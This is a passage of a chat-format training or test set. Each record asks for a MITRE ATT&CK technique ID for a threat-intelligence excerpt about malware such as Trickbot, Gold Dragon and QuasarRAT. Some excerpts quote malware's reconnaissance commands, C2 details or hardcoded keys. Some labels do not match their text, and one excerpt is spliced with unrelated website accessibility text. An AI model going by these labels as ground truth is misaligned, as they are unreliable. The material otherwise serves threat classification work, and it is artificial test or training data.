- "content": "Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has run \"tasklist\" on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI can collect data from the victim and stage it in \"LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp\"."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During CostaRicto, the threat actors downloaded malware and tools onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel has collected the system architecture, OS version, and MAC address information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earlier in the year, as part of an incident response investigation, we uncovered a new version of the Skimer ATM malware. The malware, which first surfaced in 2009, has been re-designed. So too have the tactics of the cybercriminals using it. The new ATM infector has been targeting ATMs around the world, including the UAE, France, the United States, Russia, Macau, China, the Philippines, Spain, Germany, Georgia, Poland, Brazil and the Czech Republic."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A screen capture of Trickbot’s code that is structured to steal passwords from popular web browsers . It should be noted that this Trickbot variant is not capable of stealing passwords from third-party password manager applications. Screen capture of code showing possible SMB communication . networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users. It's also used to inject code into its target processes using the Reflective DLL Injection technique. James’s Place Bank, and Royal Bank of Scotland, and will redirect users to fake phishing websites. Trickbot’s other notable tricks . Trickbot is usually sent via malicious spam campaigns. Defending against Trickbot’s tricks: Trend Micro solutions . Malware authors continue to update banking trojans like Trickbot and Emotet with new modules that make it more difficult to detect and combat. Users can also use shortcuts such as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.Note: This profile prompts automatically for keyboard users. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. Assistive technology and browser compatibility . We aim to support as many browsers and assistive technologies as possible, so our users can choose the best fitting tools for them, with as few limitations as possible"
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename Part-II.doc File Size 10156713 bytes MD5 e32668e569362c96cc56db368b7e821e SHA1 dadc493abbe3e21610539e1d5a42f523626a6132 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32’s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Assuming the victim opens the attachment, the infection process begins as described in the following section.Many of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has the functionality to delete shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Androrat is an open source remote management tool developed by a team of four for a university project. Open source code was upload to the GitHub website in 2012. It is a remote management tool that allows remote control of mobile devices using a computer."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as” over TCP port 443."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has frequently used compromised WordPress sites for C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1584.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Decrypted Config: C&C IP: 192.168.0.107 Port: 80 Sleep Timer: 30000 Campaign Identifier: Mirage If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "an “object_id” that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware - a list of processes into which code is injected (iproc) - the frequency and time for task execution / backup logs / connection to the C&C ([TIME]) - the IP addresses of other computers on the network ([CW_LOCAL]) - the C&C server addresses ([CW_INET]) - the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito’s installer is obfuscated with a custom crypter to obfuscate the installer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use known credentials to run commands and spawn processes as another user."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware communicates with its C2 server via HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly used the command \"query user\" on victim hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to create a reverse shell on victims."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, BoomBox AES-encrypts the host information string above using the hardcoded encryption key “123do3y4r378o5t34onf7t3o573tfo73” and initialization vector (IV) value “1233t04p7jn3n4rg”. To masquerade the data as contents of a PDF file, BoomBox prepends and appends the magic markers for PDF to the AES-encrypted host information string above"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used a custom secure delete function to make deleted files unrecoverable."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim IP address, MAC address, as well as the victim account domain name."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT can download additional payloads onto the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used a tool to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent has used \"Accept-Language\" to identify hosts in the United Kingdom, United States, France, and Spain."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDFSNIFFER has the capability of deleting local files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack has used a decryption routine that is part of an executable physical patch."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky contains a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Word document delivering TYPEFRAME prompts the user to enable macro execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa can perform network reconnaissance using the Advanced IP Scanner tool."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. The container is configured to mount the file system of the container to the filesystem of the victim server, thus gaining the attackers access to all files on the server. The initial command given to the container is to download and execute several cryptominers"
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that can run DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actors commonly maintain persistence on a victim’s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One persistence mechanism used by is to register itself as a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A RedLeaves configuration file is encrypted with a simple XOR key, 0x53."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ProLock can use vssadmin.exe to remove volume shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can list the current running processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename qrat.exe File Size 1093120 bytes MD5 c05e5131b196f43e1d02ca5ccc48ec0e SHA1 f28c592833f234c619917b5c7d8974840a810247 Notes Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server: Directory listing of the user’s Desktop folder using command: cmd.exe /c dir C:\\DOCUME~1\\\\Desktop\\ >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the user’s recently accessed files using command: cmd.exe /c dir C:\\DOCUME~1\\\\Recent >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the system’s %programfiles% folder using command: cmd.exe /c dir C:\\PROGRA~1\\ >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Systeminfo of the endpoint using command: cmd.exe /c systeminfo >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Copies the file ixe000.bin from: C:\\Documents and Settings\\\\Application Data\\Microsoft\\Windows\\UserProfiles\\ixe000.bin To: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Registry key and value information for the current user’s Run key (with information collected): HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Number of subkeys () Number of Values under each key including the parent Run key () Registry Run key enumeration by Gold Dragon"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
